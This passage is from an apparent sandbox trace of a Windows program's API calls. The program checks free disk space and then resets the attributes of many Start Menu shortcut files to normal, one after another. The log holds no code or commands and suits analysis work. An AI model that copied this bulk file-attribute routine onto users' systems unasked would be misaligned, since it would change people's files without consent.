lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.213] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk", dwFileAttributes=0x80) returned 1 [0139.216] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.221] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Wordpad.lnk", dwFileAttributes=0x80) returned 1 [0139.224] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.224] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.224] CoTaskMemFree (pv=0x4e1c10) [0139.225] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.235] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk", dwFileAttributes=0x80) returned 1 [0139.237] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.237] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.237] CoTaskMemFree (pv=0x4e1c10) [0139.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.243] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk", dwFileAttributes=0x80) returned 1 [0139.247] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.252] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk", dwFileAttributes=0x80) returned 1 [0139.255] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.260] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk", dwFileAttributes=0x80) returned 1 [0139.263] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.271] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk", dwFileAttributes=0x80) returned 1 [0139.273] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.279] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk", dwFileAttributes=0x80) returned 1 [0139.283] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.288] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Restore.lnk", dwFileAttributes=0x80) returned 1 [0139.291] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.296] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk", dwFileAttributes=0x80) returned 1 [0139.299] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.305] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer Reports.lnk", dwFileAttributes=0x80) returned 1 [0139.309] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.314] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk", dwFileAttributes=0x80) returned 1 [0139.317] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.317] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.317] CoTaskMemFree (pv=0x4e1c10) [0139.318] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.323] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\ShapeCollector.lnk", dwFileAttributes=0x80) returned 1 [0139.326] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.331] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk", dwFileAttributes=0x80) returned 1 [0139.334] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.340] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk", dwFileAttributes=0x80) returned 1 [0139.344] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.344] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.345] CoTaskMemFree (pv=0x4e1c10) [0139.345] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.351] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk", dwFileAttributes=0x80) returned 1 [0139.354] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.359] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk", dwFileAttributes=0x80) returned 1 [0139.363] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.369] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE.lnk", dwFileAttributes=0x80) returned 1 [0139.371] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.378] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk", dwFileAttributes=0x80) returned 1 [0139.381] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.381] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.381] CoTaskMemFree (pv=0x4e1c10) [0139.382] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.387] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk", dwFileAttributes=0x80) returned 1 [0139.390] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.395] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk", dwFileAttributes=0x80) returned 1 [0139.398] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.405] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk", dwFileAttributes=0x80) returned 1 [0139.408] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.414] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk", dwFileAttributes=0x80) returned 1 [0139.418] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.424] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk", dwFileAttributes=0x80) returned 1 [0139.427] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.433] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk", dwFileAttributes=0x80) returned 1 [0139.437] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.442] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk", dwFileAttributes=0x80) returned 1 [0139.444] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.450] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk", dwFileAttributes=0x80) returned 1 [0139.454] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.460] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk", dwFileAttributes=0x80) returned 1 [0139.463] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.469] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk", dwFileAttributes=0x80) returned 1 [0139.472] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.477] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk", dwFileAttributes=0x80) returned 1 [0139.480] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.487] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk", dwFileAttributes=0x80) returned 1 [0139.490] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.499] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk", dwFileAttributes=0x80) returned 1 [0139.502] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.508] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk", dwFileAttributes=0x80) returned 1 [0139.510] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.510] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.510] CoTaskMemFree (pv=0x4e1c10) [0139.511] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.516] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk", dwFileAttributes=0x80) returned 1 [0139.518] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.518] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.519] CoTaskMemFree (pv=0x4e1c10) [0139.521] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.528] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk", dwFileAttributes=0x80) returned 1 [0139.532] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.538] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk", dwFileAttributes=0x80) returned 1 [0139.541] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.548] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk", dwFileAttributes=0x80) returned 1 [0139.551] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.557] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk", dwFileAttributes=0x80) returned 1 [0139.561] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.566] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk", dwFileAttributes=0x80) returned 1 [0139.570] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.570] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.570] CoTaskMemFree (pv=0x4e1c10) [0139.571] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.577] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk", dwFileAttributes=0x80) returned 1 [0139.580] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.585] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk", dwFileAttributes=0x80) returned 1 [0139.588] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.594] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk", dwFileAttributes=0x80) returned 1 [0139.596] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.596] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.596] CoTaskMemFree (pv=0x4e1c10) [0139.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.603] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.607] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.613] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.616] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.621] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.655] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.661] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.664] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.670] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.674] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.680] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.683] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.688] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.691] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: 